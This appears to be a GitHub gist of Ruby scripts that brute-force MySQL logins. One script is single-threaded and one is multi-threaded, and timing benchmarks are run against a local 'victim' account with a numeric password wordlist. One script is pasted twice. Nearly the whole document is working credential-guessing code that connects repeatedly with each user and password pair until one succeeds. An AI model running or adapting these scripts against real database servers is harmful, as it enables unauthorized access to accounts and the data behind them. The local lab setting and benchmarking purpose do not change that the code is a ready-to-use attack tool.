postmodern/mysql_brute.rb

## gistfile1.md

      
    Raw
  

              gistfile1.md
            
          
    Configuration


mysql: 14.14 Distrib 5.5.14
host: 127.0.0.1
port: 3306
user: victim
password: 56789

Install

yum install mysql mysql-devel
gem install data_objects do_mysql

Ruby 1.9.3-p0

Single Threaded

9.060000  10.470000  19.530000 ( 37.228431)

Multi-Threaded

12.490000  12.680000  25.170000 ( 46.498599)

Rubinius 2.0.0dev

Single Threaded

18.055255  13.393963  31.449218 ( 57.996548)

Multi-Threaded

0.002000   0.003999   0.005999 ( 55.027924)


## mysql_brute.rb
require 'rubygems'
require 'data_objects'
require 'do_mysql'
require 'benchmark'

def bruteforce(host,port,users,wordlist)
  uri = Addressable::URI.new(
    :scheme => 'mysql',
    :host   => host,
    :port   => port,
    :path   => 'information_schema'
  )

  users.each do |user|
    uri.user = user

    wordlist.each do |password|
      uri.password = password

      puts "[*] Trying #{user}:#{password} ..."

      begin
        connection = DataObjects::Connection.new(uri)
        connection.close
      rescue DataObjects::SQLError
        next
      end

      yield user, password
      break
    end
  end
end

usernames = ['victim']
wordlist  = ('30000'..'99999')

puts Benchmark.measure {
  bruteforce('127.0.0.1',3306,usernames,wordlist) do |user,password|
    puts "#{user}: #{password}"
    break
  end
}

## mysql_brute_threaded.rb
require 'rubygems'
require 'data_objects'
require 'do_mysql'
require 'thread'
require 'benchmark'

def bruteforce(host,port,users,wordlist,max_connections=10)
  input  = Queue.new
  output = Queue.new

  thread_pool = Array.new(max_connections) do
    Thread.new do
      uri = Addressable::URI.new(
        :scheme => 'mysql',
        :host   => host,
        :port   => port,
        :path   => 'information_schema'
      )

      loop do
        user, password = input.pop

        puts "[*] Trying #{user}:#{password} ..."

        uri.user     = user
        uri.password = password

        begin
          connection = DataObjects::Connection.new(uri)
          connection.close

          output.push [user, password]
        rescue DataObjects::SQLError
        end
      end
    end
  end

  generator = Thread.new do
    users.each do |user|
      wordlist.each do |password|
        input.push [user, password]
      end
    end
  end

  sleep 2

  user, password = output.pop

  generator.kill
  thread_pool.each(&:kill)

  yield user, password
end

usernames = ['victim']
wordlist  = ('30000'..'99999')

puts Benchmark.measure {
  bruteforce('127.0.0.1',3306,usernames,wordlist) do |user,password|
    puts "#{user}: #{password}"
  end
}
	require 'rubygems'
	require 'data_objects'
	require 'do_mysql'
	require 'benchmark'

	def bruteforce(host,port,users,wordlist)
	uri = Addressable::URI.new(
	:scheme => 'mysql',
	:host => host,
	:port => port,
	:path => 'information_schema'
	)

	users.each do \|user\|
	uri.user = user

	wordlist.each do \|password\|
	uri.password = password

	puts "[*] Trying #{user}:#{password} ..."

	begin
	connection = DataObjects::Connection.new(uri)
	connection.close
	rescue DataObjects::SQLError
	next
	end

	yield user, password
	break
	end
	end
	end

	usernames = ['victim']
	wordlist = ('30000'..'99999')

	puts Benchmark.measure {
	bruteforce('127.0.0.1',3306,usernames,wordlist) do \|user,password\|
	puts "#{user}: #{password}"
	break
	end
	}